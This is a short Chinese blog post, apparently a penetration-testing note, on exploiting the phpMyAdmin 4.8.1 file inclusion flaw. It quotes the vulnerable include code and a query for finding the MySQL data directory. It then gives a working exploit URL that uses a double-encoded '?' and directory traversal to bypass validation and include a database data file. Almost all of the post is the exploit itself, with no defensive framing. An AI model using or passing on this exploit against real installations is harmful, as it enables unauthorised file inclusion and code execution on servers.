发布时间: 2020-3-3 文章作者: myluzh 分类名称: PHP 朗读文章
if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target']) ) { include $_REQUEST['target']; exit; }
show variables like 'datadir'
/index.php?target=db_sql.php%253f/../../../../../../phpstudy_pro/Extensions/MySQL5.7.26/data/test/hello.MYD 注意:上面的%253f为?经过两次url编码,这样才能绕过验证。后面为需要包含文件的路径。
标签: 渗透 漏洞 phpMyAdmin 4.8.1 文件包含
发表评论